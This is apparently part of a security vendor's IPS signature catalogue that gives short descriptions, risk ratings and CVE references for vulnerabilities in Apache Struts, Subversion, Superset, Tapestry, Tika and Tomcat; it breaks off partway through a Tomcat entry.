First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Code Injection
Description: A vulnerability in Apache Struts ParametersInterceptor, which does not properly restrict access to the getClass method, allows remote attackers to manipulate the ClassLoader and execute arbitrary code via a crafted request.
Situation: HTTP_CRL-Apache-Struts-Multiple-Classloaders-Security-Bypass
References:
CVE-2014-0112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0112
Back to top

Apache-Struts-Cookieinterceptor-Classloader-Security-Bypass

About this vulnerability: A vulnerability in Apache Software Foundation Struts
Risk: High
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Input Validation
Description: A security bypass vulnerability exists in Apache Struts. The vulnerability is due to inadequate validation of data processed by Cookie Interceptor allowing for manipulation of the ClassLoader. A remote attacker could exploit this vulnerability by providing a "class" cookie in an HTTP request. Successful exploitation could lead to a security bypass condition due to ClassLoader manipulation.
Situation: HTTP_CHS-Apache-Struts-Cookieinterceptor-Classloader-Security-Bypass
References:
CVE-2014-0113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0113
OSVDB-103918
http://www.osvdb.org/103918
Back to top

Apache-Struts-Dynamic-Method-Invocation-Remote-Code-Execution

About this vulnerability: An Apache Struts Dynamic Method Invocation Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Malfunction
Description: A vulnerability in Apache Struts, versions 2.x before 2.3.20.2, 2.3.24.x before 2.3.24.2, and 2.3.28.x before 2.3.28.1, which allows remote attackers to execute arbitrary code via method: prefix.
Situation: HTTP_CSU-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Command-Execution
References:
CVE-2016-3081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3081
Back to top

Apache-Struts-File-Upload-Vulnerability-CVE-2023-50164

About this vulnerability: A vulnerability in Apache Struts
Risk: High
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1665-5242
Platform: Generic
Software: Apache Struts
Type: Input Validation
Description: A file upload vulnerability has been reported in Apache Struts 2. This vulnerability can lead to unauthenticated remote code execution.
Situation: HTTP_CS-Apache-Struts-File-Upload-Vulnerabilities-CVE-2023-50164-CVE-2024-53677
References:
CVE-2023-50164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50164
Back to top

Apache-Struts-File-Upload-Vulnerability-CVE-2024-53677

About this vulnerability: A vulnerability in Apache Struts
Risk: High
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: Apache Struts
Type: Input Validation
Description: A file upload vulnerability has been reported in Apache Struts 2. This vulnerability can lead to unauthenticated remote code execution.
Situation: HTTP_CS-Apache-Struts-File-Upload-Vulnerabilities-CVE-2023-50164-CVE-2024-53677
References:
CVE-2024-53677
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53677
Back to top

Apache-Struts-Jakarta-Multipart-Parser-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Struts 2
Risk: High
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1621-5242
Platform: Generic
Software: Apache Struts 2
Type: Malfunction
Description: There exists a code execution vulnerability in Apache Struts. A remote attacker can use this to execute arbitrary code on the affected system.
References:
CVE-2017-5638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
Back to top

Apache-Struts-OGNL-Expressions-DefaultActionMapper-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Struts 2
Risk: High
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts 2
Type: Malfunction
Description: A code execution vulnerability exists in Apache Struts Object-Graph Navigation Language (OGNL) expressions. The vulnerability is due to the failure of DefaultActionMapper to sanitize input following "action:", "redirect:" or "redirectAction:" expressions leading to code injection. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to a server using a vulnerable version of the software. Successful exploitation will allow an attacker to execute arbitrary code on the system.
Situation: HTTP_CRL-Apache-Struts-OGNL-Expressions-DefaultActionMapper-Code-Execution
References:
CVE-2013-2251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251
BID-61189
http://www.securityfocus.com/bid/61189
OSVDB-95405
http://www.osvdb.org/95405
Back to top

Apache-Struts-OGNL-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Struts
Risk: Moderate
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1341-5242
Platform: Generic
Software: Apache Struts
Type: Input Validation
Description: Insufficient input validation causes a vulnerability in Apache Struts. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CS-Apache-Struts-OGNL-Remote-Code-Execution
HTTP_CRL-Apache-Struts-OGNL-Remote-Code-Execution
References:
CVE-2019-0230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0230
Back to top

Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530

About this vulnerability: A vulnerability in Apache Software Foundation Struts
Risk: High
First detected in: sgpkg-ips-1310-5242
Last changed: sgpkg-ips-1341-5242
Platform: Generic
Software: Apache Struts
Type: Input Validation
Description: A remote code execution has been reported in Apache Struts framework. The vulnerability is due to insufficient input validation leading to a forced double OGNL evaluation when evaluating raw user input. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation will allow an attacker to execute arbitrary code with the privileges of the server.
Situation: HTTP_CS-Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530
HTTP_CRL-Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530
References:
CVE-2020-17530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17530
Back to top

Apache-Struts-Parametersinterceptor-Classloader-Security-Bypass

About this vulnerability: A vulnerability in Apache Software Foundation Struts
Risk: High
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Input Validation
Description: A security-bypass vulnerability exists in Apache Struts. The vulnerability is due to inadequate validation of data processed by ParametersInterceptor allowing for manipulation of the ClassLoader. A remote attacker could exploit this vulnerability by providing a class parameter in a request. Successful exploitation could lead to a security bypass condition due to ClassLoader manipulation.
Situation: HTTP_CRL-Apache-Struts-Multiple-Classloaders-Security-Bypass
References:
CVE-2014-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0094
BID-65999
http://www.securityfocus.com/bid/65999
OSVDB-103918
http://www.osvdb.org/103918
Back to top

Apache-Struts-RCE-CVE-2018-11776

About this vulnerability: A vulnerability in Apache Software Foundation Struts
Risk: Moderate
First detected in: sgpkg-ips-1095-5242
Last changed: sgpkg-ips-1477-5242
Platform: Generic
Software: Apache Struts
Type: Malfunction
Description: A Remote Code Execution vulnerability exists in Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16.
Situation: HTTP_CSU-Suspicious-OGNL-Expression
HTTP_CSU-Apache-Struts-RCE-CVE-2018-11776
HTTP_CSU-Suspicious-OGNL-Expression-2
References:
CVE-2018-11776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776
Back to top

Apache-Struts-Rest-Plugin-DMI-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Struts 2
Risk: High
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts 2
Type: Input Validation
Description: There exists a code execution vulnerability in Apache Struts.
Situation: HTTP_CRL-Apache-Struts-Rest-Plugin-DMI-Code-Execution
References:
CVE-2016-3087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3087
Back to top

Apache-Struts-Url-And-Anchor-Tag-Includeparams-OGNL-Command-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Struts
Risk: High
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Malfunction
Description: A command execution vulnerability exists in Apache Struts Object-Graph Navigation Language (OGNL) expressions. The vulnerability is due to the way parameters passed via Struts s:a and s:url tags to the server are evaluated by OGNL when the includeParams field is "get" or "all". The url/a tags resolve every parameter passed to them, allowing arbitrary OGNL expressions encoded into the URL to be evaluated bypassing both Struts and OGNL library protections. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to a server using a vulnerable version of the software. Successful exploitation will allow an attacker to execute arbitrary commands in the context of the server. CVE-2013-1966 is also covered as it had an incomplete fix.
Situation: HTTP_CSU-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Command-Execution
References:
CVE-2013-2115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115
BID-60167
http://www.securityfocus.com/bid/60167
OSVDB-93645
http://www.osvdb.org/93645
Back to top

Apache-Struts-Urlvalidator-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation Struts 2
Risk: High
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts 2
Type: Input Validation
Description: A vulnerability in Apache Struts URLValidator, versions 2.3.20 through 2.3.28.1, 2.5, which allows remote attackers to create a denial of service condition by sending a crafted HTTP request.
Situation: HTTP_CRL-Apache-Struts-Urlvalidator-Denial-Of-Service
References:
CVE-2016-4465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4465
Back to top

Apache-Struts-Wildcard-Matching-OGNL-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Struts 2
Risk: Moderate
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-1477-5242
Platform: Generic
Software: Apache Struts
Type: Malfunction
Description: There is a code execution vulnerability in Apache Struts Object-Graph Navigation Language (OGNL) expressions. The vulnerability is due to the way action names passed via Wildcard Matching to the server are evaluated by OGNL and allows arbitrary OGNL expressions encoded in a URI to be evaluated bypassing both Struts and OGNL library protections. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to a server using a vulnerable version of the software. Successful exploitation will allow an attacker to execute arbitrary OGNL code in the context of the server.
Situation: HTTP_CSU-Suspicious-OGNL-Expression
HTTP_CSU-Suspicious-OGNL-Expression-2
References:
CVE-2013-2134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2134
BID-64758
http://www.securityfocus.com/bid/64758
OSVDB-93969
http://www.osvdb.org/93969
Back to top

Apache-Struts-Xsltresult-File-Inclusion

About this vulnerability: A vulnerability in Apache Software Foundation Struts 2
Risk: Moderate
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts 2
Type: Input Validation
Description: Improper parsing of request parameters in Apach Struts 2 results in a vulnerability, which can allow an attacker to run arbitrary code.
Situation: HTTP_CRL-Apache-Struts-Xsltresult-File-Inclusion
References:
CVE-2016-3082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3082
Back to top

Apache-Struts2-File-Upload-DoS

About this vulnerability: A vulnerability in Apache Struts2
Risk: High
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts 2
Type: Input Validation
Description: There exists a vulnerability in Apache Struts2 framework that allows remote attackers to cause a denial of service condition by sending a crafted request, due to insufficient input validation.
Situation: HTTP_CS-Apache-Struts2-File-Upload-DoS
References:
CVE-2019-0233
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0233
Back to top

Apache-Subversion-Mod_authz_SVN-Copy-Move-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation Subversion
Risk: Moderate
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Subversion
Type: Malfunction
Description: There exists a NULL pointer dereference vulnerability in Apache Subversion. A remote attacker can use this to cause a Denial Of Service condition.
Situation: HTTP_CSH-Apache-Subversion-Mod_authz_SVN-Copy-Move-Denial-Of-Service
References:
CVE-2016-2168
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2168
Back to top

Apache-Subversion-Mod_Dav_SVN-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation Subversion
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Subversion
Type: Malfunction
Description: A denial of service vulnerability has been reported in Apache Subversion. This vulnerability is due to improper dereference of an uninitialized pointer variable. A remote attacker could exploit this vulnerability by sending a recursive directory listing request. Successful exploitation could cause denial of service conditions of the target Subversion server.
Situation: HTTP_CS-Apache-Subversion-Mod_Dav_SVN-Denial-Of-Service
References:
CVE-2018-11803
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11803
Back to top

Apache-Subversion-Mod_Dav_SVN-Integer-Overflow

About this vulnerability: A vulnerability in Apache Software Foundation Subversion
Risk: Moderate
First detected in: sgpkg-ips-722-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Subversion
Type: Integer Overflow
Description: Heap overflow and out-of-bounds read vulnerabilities have been reported in the mod_dav_svn of Apache Subversion web servers. These vulnerabilities are caused by an integer overflow when parsing certain encoded requests. A remote, authenticated attacker could exploit this vulnerability by writing memory past an unspecified heap buffer. Successful exploitation on 32-bit systems could lead to code execution under context of the httpd process, as well as denial of service. Successful exploitation on 64-bit systems could lead to denial of service but not code execution.
Situation: HTTP_CSH-Apache-Subversion-Mod_Dav_SVN-Integer-Overflow
References:
CVE-2015-5343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5343
Back to top

Apache-Subversion-SVN-Protocol-Parser-Integer-Overflow

About this vulnerability: A vulnerability in Apache Software Foundation Subversion
Risk: High
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Subversion
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in Apache Subversion. A remote, unauthenticated attacker can send a crafted request causing a denial-of-service condition or execute arbitrary code.
Situation: SVN_Apache-Subversion-SVN-Protocol-Parser-Integer-Overflow
References:
CVE-2015-5259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5259
Back to top

Apache-Subversion-SVN-SSH-Url-Command-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Subversion
Risk: Moderate
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Subversion
Type: Input Validation
Description: Improper parsing of SSH urls results in a command injection in Subversion. A successful exploitation allows arbitrary commands to be executed on the target system with the privileges of the affected user.
Situation: HTTP_SHS-Apache-Subversion-SVN-SSH-Url-Command-Execution
File-TextId_Apache-Subversion-SVN-SSH-Url-Command-Execution
SVN_SS-Apache-Subversion-SVN-SSH-Url-Command-Execution
References:
CVE-2017-9800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9800
Back to top

Apache-Superset-Import-Dashboards-CVE-2018-8021

About this vulnerability: A vulnerability in Apache Superset
Risk: High
First detected in: sgpkg-ips-1384-5242
Last changed: sgpkg-ips-1384-5242
Platform: Generic
Software: Apache Superset
Type: Code Injection
Description: There exists a remote code execution vulnerability in Apache Superset, versions before 0.23, due to an unsafe load method in the pickle library.
Situation: HTTP_CS-Apache-Superset-Import-Dashboards-CVE-2018-8021
References:
CVE-2018-8021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8021
Back to top

Apache-Superset-Insecure-Deserialization-CVE-2023-37941

About this vulnerability: An attempt to exploit a vulnerability in Apache Superset detected
Risk: High
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1634-5242
Platform: Generic
Software: Apache Superset
Type: Input Validation
Description: If an attacker gains write access to the Apache Superset metadata database, they could persist a specifically crafted Python object that may lead to remote code execution on Superset's web backend. This vulnerability impacts Apache Superset versions 1.5.0 up to and including 2.1.0.
Situation: File-Text_Apache-Superset-Insecure-Deserialization-CVE-2023-37941
References:
CVE-2023-37941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-37941
Back to top

Apache-Superset-Markdown-Component-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation Incubator Superset
Risk: Moderate
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1332-5242
Platform: Generic
Software: Apache Superset
Type: Input Validation
Description: Insufficient validation of user-sent Markdown snippets in a dashboard causes a cross-site scripting vulnerability in Apache Superset.
Situation: HTTP_CRL-Apache-Superset-Markdown-Component-Stored-Cross-Site-Scripting
References:
CVE-2021-27907
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27907
Back to top

Apache-Superset-Sqlite-URI-Bypass-CVE-2023-39265

About this vulnerability: An attempt to exploit a vulnerability in Apache Superset detected
Risk: High
First detected in: sgpkg-ips-1633-5242
Last changed: sgpkg-ips-1633-5242
Platform: Generic
Software: Apache Superset
Type: Input Validation
Description: Apache Superset would allow for SQLite database connections to be incorrectly registered when an attacker uses alternative driver names like sqlite+pysqlite or by using database imports. This could allow for unexpected file creation on Superset webservers. Additionally, if Apache Superset is using a SQLite database for its metadata (not advised for production use) it could result in more severe vulnerabilities related to confidentiality and integrity. This vulnerability exists in Apache Superset versions up to and including 2.1.0.
Situation: File-Text_Apache-Superset-Sqlite-URI-Bypass-CVE-2023-39265
References:
CVE-2023-39265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39265
Back to top

Apache-Superset-Unrestricted-Database-Import-CVE-2023-39265

About this vulnerability: An attempt to exploit a vulnerability in Apache Superset detected
Risk: High
First detected in: sgpkg-ips-1633-5242
Last changed: sgpkg-ips-1634-5242
Platform: Generic
Software: Apache Superset
Type: Input Validation
Description: Apache Superset would allow for SQLite database connections to be incorrectly registered when an attacker uses alternative driver names like sqlite+pysqlite or by using database imports. This could allow for unexpected file creation on Superset webservers. Additionally, if Apache Superset is using a SQLite database for its metadata (not advised for production use) it could result in more severe vulnerabilities related to confidentiality and integrity. This vulnerability exists in Apache Superset versions up to and including 2.1.0.
References:
CVE-2023-39265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39265
Back to top

Apache-Superset-Url-Shortener-Open-Redirect

About this vulnerability: A vulnerability in Apache Software Foundation Incubator Superset
Risk: Moderate
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Platform: Generic
Software: Apache Superset
Type: Input Validation
Description: An open redirect vulnerability has been reported in Apache Superset. This vulnerability is due to improper validation of user-supplied input for the URL shortener functionality. A remote attacker can exploit this vulnerability by creating a link to an external URL using the URL shortener functionality. Successful exploitation would allow the attacker to spoof a user to open a link to a external site.
Situation: HTTP_CRL-Apache-Superset-Url-Shortener-Open-Redirect
References:
CVE-2021-28125
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28125
Back to top

Apache-SVN-Authzsvnreposrelativeaccessfile-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Apache Software Foundation Subversion
Risk: Moderate
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Platform: Generic
Software: Subversion
Type: Input Validation
Description: Improper handling of requests for non-existing repository URLs when the server is using in-repository authz rules with the AuthzSVNReposRelativeAccessFile option causes a null pointer dereference vulerability which can cause a denial of service condition when triggered.
Situation: HTTP_CSU-Apache-Subversion-Authzsvnreposrelativeaccessfile-Null-Pointer-Dereference
References:
CVE-2020-17525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17525
Back to top

Apache-Tapestry-Classpathassetrequesthandler-Information-Disclosure

About this vulnerability: A vulnerability in Apache Software Foundation Tapestry
Risk: Moderate
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Platform: Generic
Software: Apache Tapestry
Type: Input Validation
Description: Improper input validation and URL manipulation causes a vulnerability in Apache Tapestry. A successful exploit allows an attacker to access data on the target system.
Situation: HTTP_CRL-Apache-Tapestry-Classpathassetrequesthandler-Information-Disclosure
References:
CVE-2021-27850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27850
Back to top

Apache-Tapestry-ContextAssetRequestHandler-Information-Disclosure

About this vulnerability: A vulnerability in Apache Tapestry
Risk: High
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tapestry
Type: Input Validation
Description: There exists a vulnerability in Apache Tapestry, versions 5.4.0 to 5.5.0, which allows remote attackers to retrieve files inside the WEB-INF folder by sending a crafted URL.
Situation: HTTP_CSU_Apache-Tapestry-ContextAssetRequestHandler-Information-Disclosure
References:
CVE-2020-13953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13953
Back to top

Apache-Tika-Chmparser-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation Apache Tika
Risk: Moderate
First detected in: sgpkg-ips-1069-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tika
Type: Input Validation
Description: Improper handling of Microsoft Compiled HTML Help files causes a vulnerability in Apache Tika. A successful exploit allows an attacker to cause a denial of service condition on the target system.
Situation: File-Binary_Apache-Tika-Chmparser-Denial-Of-Service
References:
CVE-2018-1339
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1339
Back to top

Apache-Tika-Header-Command-Injection

About this vulnerability: A vulnerability in Apache Tika
Risk: High
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Apache Tika
Type: Input Validation
Description: A vulnerability in Apache Tika, versions 1.15 - 1.17, which allows remote attackers to execute arbitrary code using specially crafted headers.
Situation: HTTP_CS-Apache-Tika-Header-Command-Injection
References:
CVE-2018-1335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1335
Back to top

Apache-Tika-Server-Command-Injection-Vulnerability

About this vulnerability: A vulnerability in Apache Software Foundation Apache Tika
Risk: Moderate
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tika
Type: Input Validation
Description: Improper validation of request headers causes a command injection vulnerability in Apache Tika. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CSH-Apache-Tika-Server-Command-Injection-Vulnerability
References:
CVE-2018-1335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1335
Back to top

Apache-Tomcat-ajp-Local-File-Inclusion

About this vulnerability: A vulnerability in Apache Tomcat
Risk: Moderate
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Malfunction
Description: There exists a local file inclusion vulnerability in Apache Tomcat. Successful exploitation could lead in the disclosure of file on the target server.
Situation: Generic_CS-Apache-Tomcat-ajp-Local-File-Inclusion
References:
CVE-2020-1938
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938
Back to top

Apache-Tomcat-Allowlinking-Uriencoding-Directory-Traversal

About this vulnerability: A vulnerability in Apache Software Foundation Tomcat
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in the Apache Tomcat.
Situation: HTTP_CSU-Apache-Tomcat-Allowlinking-Uriencoding-Directory-Traversal
References:
CVE-2008-2938
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
BID-30633
http://www.securityfocus.com/bid/30633
Back to top

Apache-Tomcat-CGIServlet-enableCmdLineArguments-RCE

About this vulnerability: A vulnerability in Apache Tomcat CGIServlet
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Apache Tomcat
Type: Malfunction
Description: A vulnerability in Apache Tomcat CGIServlet, versions 9.0 and before, which allows remote attackers to execute arbitrary code due to a bug in the way command line arguments are passed.
Situation: HTTP_CSU-Remote-Code-Execution-Via-Cgi-Batch-Arguments
References:
CVE-2019-0232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0232
Back to top

Apache-Tomcat-Chunked-Transfer-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation Tomcat
Risk: Moderate
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Input Validation
Description: A denial of service vulnerability has been identified in Apache Tomcat as it processes Chunked-Transfer encoded requests. The error is caused by Tomcat not discarding any extensions included in very long Chunked-transfer requests, even if they were not processed. A remote attacker could exploit this vulnerability to send a large amount of data to the server causing it to use up excessive resources. This can result in a limited denial of service condition.
Situation: HTTP_CS-Apache-Tomcat-Chunked-Transfer-Denial-Of-Service
HTTP_CCH-Apache-Tomcat-Chunked-Transfer-Denial-Of-Service
References:
CVE-2012-3544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3544
BID-59797
http://www.securityfocus.com/bid/59797
BID-64758
http://www.securityfocus.com/bid/64758
OSVDB-93253
http://www.osvdb.org/93253
Back to top

Apache-Tomcat-Chunkedinputfilter-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation Tomcat
Risk: High
First detected in: sgpkg-ips-938-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Resource Starvation
Description: There exists a resource exhaustion vulnerability in Apache Tomcat.
Situation: HTTP_CS-Apache-Tomcat-Chunkedinputfilter-Denial-Of-Service
References:
CVE-2014-0227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0227
OSVDB-118214
http://www.osvdb.org/118214
Back to top

Apache-Tomcat-Chunkedinputfilter-Malformed-Chunk-Size-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation Tomcat
Risk: Moderate
First detected in: sgpkg-ips-592-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Resource Starvation
Description: A denial of service vulnerability exists in Apache Tomcat Application Server. The vulnerability is due to a failure to limit the chunk size in an HTTP request. A remote unauthenticated attacker could exploit this vulnerability by sending a malicious chunk size in an HTTP request. Successful exploitation could lead to a denial of service condition on the server.
Situation: HTTP_CCH-Maliciously-Large-Chunk-Size
References:
CVE-2014-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0075
BID-67671
http://www.securityfocus.com/bid/67671
OSVDB-107450
http://www.osvdb.org/107450
Back to top

Apache-Tomcat-Default-Servlet-Open-Redirect

About this vulnerability: A vulnerability in Apache Software Foundation Tomcat
Risk: Moderate
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Input Validation
Description: Insufficient sanitization of redirections causes a vulnerability in Apache Tomcat. A successful exploit allows an attacker to redirect users to spoofed sites.
Situation: HTTP_SHS-Apache-Tomcat-Default-Servlet-Open-Redirect
References:
CVE-2018-11784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11784
Back to top

Apache-Tomcat-Directory-Listing-Information-Disclosure

About this vulnerability: A vulnerability in Apache Software Foundation Tomcat
Risk: Low
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Malfunction
Description: There exists an arbitrary directory Information Disclosure vulnerability in Apache Tomcat. The flaw is caused by overly lax default permissions set by the product. An attacker may exploit this vulnerability to retrieve a complete listing of all the files in any directory. The target will not exhibit any unusual behaviour as a result of this attack. A successful attack will result in potentially sensitive information being disclosed to an unprivileged user. The list of files in any directory specified by the attacker in the request will be served in the HTTP response.
Situation: HTTP_CRL-Apache-Tomcat-Directory-Listing-Information-Disclosure
References:
BID-19106
http://www.securityfocus.com/bid/19106
Back to top

Apache-Tomcat-Fileupload-Content-Type-Header-Infinite-Loop

About this vulnerability: A vulnerability in Apache Software Foundation Commons FileUpload
Risk: Moderate
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Infinite Loop
Description: An infinite loop vulnerability exists in Apache Tomcat. The vulnerability is due to insufficient boundary checks when processing the Content-Type header of a multipart request. A remote attacker could exploit this vulnerability by sending a large amount of data to the server causing it to use up excessive resources. Successful exploitation could cause a denial of service condition on the server.
Situation: HTTP_CSH-Apache-Tomcat-Fileupload-Content-Type-Header-Infinite-Loop
References:
CVE-2014-0050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050
BID-65400
http://www.securityfocus.com/bid/65400
OSVDB-102945
http://www.osvdb.org/102945
Back to top

Apache-Tomcat-Formauthenticator-Open-Redirect

About this vulnerability: A vulnerability in Apache Software Foundation Tomcat
Risk: Moderate
First detected in: sgpkg-ips-1642-5242
Last changed: sgpkg-ips-1642-5242
Platform: Generic
Software: Apache Tomcat
Type: Input Validation
Description: Insufficient sanitization of crafted URLs causes an open redirect vulnerability in Apache Tomcat. A successful exploit allows an attacker to direct traffic to and a malicious website.
Situation: HTTP_CSU-Apache-Tomcat-Formauthenticator-Open-Redirect
References:
CVE-2023-41080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41080
Back to top

Apache-Tomcat-getCanonicalPath-Remote-Code-Execution-CVE-2024-56337

About this vulnerability: A vulnerability in Apache Tomcat
Risk: High
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Platform: Generic
